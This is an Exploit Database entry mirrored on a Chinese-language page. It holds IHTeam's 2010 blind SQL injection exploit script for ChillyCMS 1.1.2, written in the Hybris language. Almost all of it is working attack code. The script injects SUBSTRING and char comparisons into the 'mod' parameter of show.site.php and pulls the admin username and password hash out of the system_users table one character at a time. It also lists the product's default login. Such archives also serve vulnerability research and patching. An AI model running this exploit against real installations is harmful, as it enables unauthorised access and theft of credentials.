ChillyCMS – Blind SQL Injection

• Exploit Database
• 14 阅读

• 作者： IHTeam
  日期： 2010-05-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12643/

• #!/usr/bin/hybris
  #################################################################################
  #
  # Exploit Title: ChillyCMS Blind Sql Injection
  # Date: 14-05-2010
  # Author: IHTeam
  # Software Link:
  http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9
  # Version: 1.1.2
  # Tested on: Win/Linux
  #
  #
  # Example:
  # [user@user Advisories]$ hybris chillycms.hy
  # Searching Username... :
  # admin
  # Searching MD5... :
  # d033e22ae348aeb5660fc2140aec35850c4da997
  #
  #
  # DEFAULT USERNAME AND PASSWORD:
  # User: jens
  # Pass: demo
  #
  # Thanks to evilsocket for Hybris
  # http://www.hybris-lang.org/
  #################################################################################
  
  import std.*;
  
  query1 = "4/**/AND/**/(SELECT/**/SUBSTRING(";
  query2 = ")/**/FROM/**/system_users/**/limit/**/0,1)=char(";
  
  chars =
  [48:0,49:1,50:2,51:3,52:4,53:5,54:6,55:7,56:8,57:9,97:'a',98:'b',99:'c',100:'d',101:'e',102:'f'];
  usr = "";
  password = "";
  
  i=1;
  println("Searching Username... : ");
  while(1) {
  found=false;
  chrs = 'a' .. 'z';
  foreach(char of chrs) {
  _chrs = toint(char);
  url =
  "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"user,"+i+",1"+query2+_chrs+")";
  html = http_get( "http://localhost", url );
  if (html ~= "/name='user'/") {
  usr += char;
  i+=1;
  found=true;
  }
  }
  if (!found) {
  break;
  }
  }
  println(usr);
  
  i=1;
  println("Searching MD5... : ");
  while(1) {
  found=false;
  foreach(char of chars.keys()) {
  url =
  "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"pw,"+i+",1"+query2+char+")";
  html = http_get( "http://localhost", url );
  if (html ~= "/name='user'/") {
  password += chars[char];
  i+=1;
  found=true;
  }
  }
  if (!found) {
  break;
  }
  }
  println(password);
  println();